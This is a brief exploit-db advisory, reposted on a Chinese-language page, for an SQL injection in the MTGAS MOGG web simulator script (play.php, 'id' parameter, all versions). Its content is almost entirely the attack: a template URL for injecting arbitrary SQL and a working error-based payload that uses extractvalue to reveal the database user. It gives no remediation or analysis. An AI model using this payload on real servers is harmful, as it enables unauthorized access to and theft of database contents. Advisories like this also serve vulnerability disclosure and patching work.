MTGAS MOGG Web Simulator Script – SQL Injection

  • 作者: Meisam Monsef
    日期: 2018-10-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45717/
  • # Exploit Title: MOGG web simulator Script - SQL Injection
    # Date: 2018-10-29
    # Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce -
    @dorsateam
    # Vendor Homepage: https://github.com/spider312/mtgas
    # Version: All Version
    
    
    Exploit :
    http://server/play.php?id=99999'+[SQL Command]+#
    http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23